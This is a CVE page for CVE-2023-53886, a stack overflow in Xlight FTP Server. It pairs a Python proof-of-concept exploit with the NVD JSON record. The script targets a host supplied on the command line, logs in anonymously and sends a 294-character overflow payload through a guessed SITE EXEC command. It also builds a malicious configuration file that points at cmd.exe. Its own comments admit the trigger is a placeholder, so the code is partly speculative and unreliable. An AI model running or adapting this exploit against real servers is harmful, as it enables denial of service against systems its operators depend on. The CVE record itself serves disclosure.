CVE-2023-53886

#!/usr/bin/env python3 # CVE-2023-53886 PoC - Xlight FTP Server Stack Buffer Overflow # This PoC demonstrates the DoS vulnerability in the Execute Program configuration # Reference: https://www.exploit-db.com/exploits/51665 import socket import sys def exploit_cve_2023_53886(target_ip, target_port=21): """ Exploit for CVE-2023-53886 - Xlight FTP Server Stack Buffer Overflow The vulnerability exists in the 'Execute Program' configuration feature. Sending a payload of approximately 294 characters causes a stack buffer overflow, leading to application crash (DoS). Args: target_ip: Target Xlight FTP Server IP address target_port: FTP control port (default: 21) Returns: bool: True if exploit sent successfully, False otherwise """ try: # Create socket connection sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) print(f"[*] Connected to {target_ip}:{target_port}") # Receive FTP banner banner = sock.recv(1024) print(f"[*] Banner: {banner.decode().strip()}") # The vulnerable payload - 294 'A' characters # This overflows the stack buffer in Execute Program configuration payload = "A" * 294 # Method 1: Login and trigger via SITE command (if supported) # Most FTP servers require authentication for SITE commands # Login sock.send(b"USER anonymous\r\n") response = sock.recv(1024) print(f"[*] USER response: {response.decode().strip()}") sock.send(b"PASS [email protected]\r\n") response = sock.recv(1024) print(f"[*] PASS response: {response.decode().strip()}") # Try to trigger the vulnerability via raw configuration # Note: Actual exploitation may require specific FTP commands or # direct manipulation of the configuration file print(f"[*] Sending overflow payload ({len(payload)} bytes)...") # This is a placeholder - actual exploitation requires # identifying the specific command that triggers Execute Program # Common approaches: # 1. SITE EXEC command (if supported) # 2. Direct config file modification # 3. Admin interface exploitation # Example: If SITE EXEC is supported try: site_exec_cmd = f"SITE EXEC {payload}\r\n" sock.send(site_exec_cmd.encode()) print(f"[*] Sent: SITE EXEC command with payload") except: pass # Alternative: Send raw data that might trigger the overflow sock.send(payload.encode()) print(f"[*] Payload sent") sock.close() print("[*] Exploit sent. Target should crash if vulnerable.") return True except socket.error as e: print(f"[!] Socket error: {e}") return False except Exception as e: print(f"[!] Error: {e}") return False def create_config_exploit(): """ Alternative method: Generate malicious config file content that can be used to trigger the vulnerability """ payload = "A" * 294 # Xlight FTP Server config file exploit template config_content = f"""<?xml version="1.0"?> <Configuration> <ExecuteProgram> <Enabled>true</Enabled> <ProgramPath>C:\\Windows\\System32\\cmd.exe</ProgramPath> <Arguments>/c {payload}</Arguments> </ExecuteProgram> </Configuration>""" return config_content if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2023_53886.py <target_ip> [port]") print("Example: python cve_2023_53886.py 192.168.1.100 21") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 21 print("=" * 60) print("CVE-2023-53886 - Xlight FTP Server Stack Buffer Overflow") print("=" * 60) exploit_cve_2023_53886(target, port)

{"cve": {"id": "CVE-2023-53886", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:51.690", "lastModified": "2025-12-18T21:42:33.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Xlight FTP Server 3.9.3.6 contains a stack buffer overflow vulnerability in the 'Execute Program' configuration that allows attackers to crash the application. Attackers can trigger the vulnerability by inserting 294 characters into the program execution configuration, causing a denial of service condition."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xlightftpd:xlight_ftp_server:3.9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "B93370A0-D025-4000-932C-C41E3CE37071"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51665", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/xlight-ftp-server-stack-buffer-overflow-vulnerability-via-execute-program", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.xlightftpd.com/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51665", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}